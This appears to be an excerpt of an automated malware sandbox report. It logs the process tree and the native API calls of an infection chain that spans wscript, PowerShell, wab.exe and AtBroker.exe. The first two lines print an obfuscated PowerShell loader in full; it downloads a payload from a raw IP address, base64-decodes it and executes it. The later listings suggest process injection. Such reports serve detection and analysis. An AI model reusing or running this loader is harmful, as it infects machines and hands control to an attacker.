        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227435C0 NtCreateMutant,LdrInitializeThunk,8_2_227435C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742B60 NtClose,LdrInitializeThunk,8_2_22742B60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_22742C70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_22742DF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22744340 NtSetContextThread,8_2_22744340
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22743010 NtOpenDirectoryObject,8_2_22743010
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22743090 NtSetValueKey,8_2_22743090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22744650 NtSuspendThread,8_2_22744650
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742AF0 NtWriteFile,8_2_22742AF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742AD0 NtReadFile,8_2_22742AD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742AB0 NtWaitForSingleObject,8_2_22742AB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742BF0 NtAllocateVirtualMemory,8_2_22742BF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742BE0 NtQueryValueKey,8_2_22742BE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742BA0 NtEnumerateValueKey,8_2_22742BA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742B80 NtQueryInformationFile,8_2_22742B80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227439B0 NtGetContextThread,8_2_227439B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742E30 NtWriteVirtualMemory,8_2_22742E30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742EE0 NtQueueApcThread,8_2_22742EE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742EA0 NtAdjustPrivilegesToken,8_2_22742EA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742E80 NtReadVirtualMemory,8_2_22742E80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742F60 NtCreateProcessEx,8_2_22742F60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742F30 NtCreateSection,8_2_22742F30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742FE0 NtCreateFile,8_2_22742FE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742FB0 NtResumeThread,8_2_22742FB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742FA0 NtQuerySection,8_2_22742FA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742F90 NtProtectVirtualMemory,8_2_22742F90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742C60 NtCreateKey,8_2_22742C60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742C00 NtQueryInformationProcess,8_2_22742C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742CF0 NtOpenProcess,8_2_22742CF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742CC0 NtQueryVirtualMemory,8_2_22742CC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742CA0 NtQueryInformationToken,8_2_22742CA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22743D70 NtOpenThread,8_2_22743D70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742D30 NtUnmapViewOfSection,8_2_22742D30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22743D10 NtOpenProcessToken,8_2_22743D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742D10 NtMapViewOfSection,8_2_22742D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742D00 NtSetInformationFile,8_2_22742D00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742DD0 NtDelayExecution,8_2_22742DD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22742DB0 NtEnumerateKey,8_2_22742DB0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D035C0 NtCreateMutant,LdrInitializeThunk,11_2_04D035C0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D04650 NtSuspendThread,LdrInitializeThunk,11_2_04D04650
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D03090 NtSetValueKey,LdrInitializeThunk,11_2_04D03090
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D04340 NtSetContextThread,LdrInitializeThunk,11_2_04D04340
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_04D02CA0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_04D02C70
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02C60 NtCreateKey,LdrInitializeThunk,11_2_04D02C60
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02DD0 NtDelayExecution,LdrInitializeThunk,11_2_04D02DD0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_04D02DF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02D10 NtMapViewOfSection,LdrInitializeThunk,11_2_04D02D10
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_04D02D30
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02EE0 NtQueueApcThread,LdrInitializeThunk,11_2_04D02EE0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_04D02E80
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02FE0 NtCreateFile,LdrInitializeThunk,11_2_04D02FE0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02FB0 NtResumeThread,LdrInitializeThunk,11_2_04D02FB0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02F30 NtCreateSection,LdrInitializeThunk,11_2_04D02F30
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D039B0 NtGetContextThread,LdrInitializeThunk,11_2_04D039B0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02AD0 NtReadFile,LdrInitializeThunk,11_2_04D02AD0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02AF0 NtWriteFile,LdrInitializeThunk,11_2_04D02AF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_04D02BF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02BE0 NtQueryValueKey,LdrInitializeThunk,11_2_04D02BE0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_04D02BA0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02B60 NtClose,LdrInitializeThunk,11_2_04D02B60
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D03010 NtOpenDirectoryObject,11_2_04D03010
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02CC0 NtQueryVirtualMemory,11_2_04D02CC0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02CF0 NtOpenProcess,11_2_04D02CF0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02C00 NtQueryInformationProcess,11_2_04D02C00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02DB0 NtEnumerateKey,11_2_04D02DB0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D03D70 NtOpenThread,11_2_04D03D70
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D03D10 NtOpenProcessToken,11_2_04D03D10
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02D00 NtSetInformationFile,11_2_04D02D00
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02EA0 NtAdjustPrivilegesToken,11_2_04D02EA0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02E30 NtWriteVirtualMemory,11_2_04D02E30
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02F90 NtProtectVirtualMemory,11_2_04D02F90
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02FA0 NtQuerySection,11_2_04D02FA0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02F60 NtCreateProcessEx,11_2_04D02F60
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02AB0 NtWaitForSingleObject,11_2_04D02AB0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_04D02B80 NtQueryInformationFile,11_2_04D02B80
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CF8AD0 NtReadFile,11_2_02CF8AD0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CF8B90 NtDeleteFile,11_2_02CF8B90
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CF89A0 NtCreateFile,11_2_02CF89A0
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CF8C10 NtClose,11_2_02CF8C10
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_02CF8D50 NtAllocateVirtualMemory,11_2_02CF8D50
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F2CAD62_2_00007FF848F2CAD6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F2D8822_2_00007FF848F2D882
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07ACC2585_2_07ACC258
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B02748_2_227B0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B12ED8_2_227B12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272B2C08_2_2272B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227902C08_2_227902C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227152A08_2_227152A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FD34C8_2_226FD34C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CA3528_2_227CA352
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C132D8_2_227C132D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271E3F08_2_2271E3F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D03E68_2_227D03E6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2275739A8_2_2275739A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C70E98_2_227C70E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CF0E08_2_227CF0E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227170C08_2_227170C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BF0CC8_2_227BF0CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227DB16B8_2_227DB16B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2274516C8_2_2274516C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226FF1728_2_226FF172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227981588_2_22798158
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227AA1188_2_227AA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227001008_2_22700100
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C81CC8_2_227C81CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271B1B08_2_2271B1B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D01AA8_2_227D01AA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272C6E08_2_2272C6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C16CC8_2_227C16CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227107708_2_22710770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227347508_2_22734750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270C7C08_2_2270C7C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CF7B08_2_227CF7B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227014608_2_22701460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C24468_2_227C2446
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CF43F8_2_227CF43F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BE4F68_2_227BE4F6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C75718_2_227C7571
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227105358_2_22710535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227AD5B08_2_227AD5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227D05918_2_227D0591
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22783A6C8_2_22783A6C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CFA498_2_227CFA49
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C7A468_2_227C7A46
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227BDAC68_2_227BDAC6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22755AA08_2_22755AA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227ADAAC8_2_227ADAAC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270EA808_2_2270EA80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CFB768_2_227CFB76
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CAB408_2_227CAB40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22785BF08_2_22785BF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2274DBF98_2_2274DBF9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C6BD78_2_227C6BD7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272FB808_2_2272FB80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227128408_2_22712840
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271A8408_2_2271A840
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2277D8008_2_2277D800
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2273E8F08_2_2273E8F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227138E08_2_227138E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_226F68B88_2_226F68B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227269628_2_22726962
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227199508_2_22719950
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272B9508_2_2272B950
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227129A08_2_227129A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227DA9A68_2_227DA9A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22710E598_2_22710E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CEE268_2_227CEE26
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CEEDB8_2_227CEEDB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22719EB08_2_22719EB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22722E908_2_22722E90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CCE938_2_227CCE93
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22784F408_2_22784F40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22730F308_2_22730F30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22752F288_2_22752F28
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CFF098_2_227CFF09
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271CFE08_2_2271CFE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22702FC88_2_22702FC8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CFFB18_2_227CFFB1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2278EFA08_2_2278EFA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22711F928_2_22711F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22789C328_2_22789C32
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22710C008_2_22710C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22700CF28_2_22700CF2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227CFCF28_2_227CFCF2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227B0CB58_2_227B0CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C7D738_2_227C7D73
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_227C1D5A8_2_227C1D5A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22713D408_2_22713D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2271AD008_2_2271AD00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2270ADE08_2_2270ADE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_2272FDC08_2_2272FDC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_22728DBF8_2_22728DBF
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_0114C83810_2_0114C838
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeCode function: 10_2_0114A8B810_2_0114A8B8
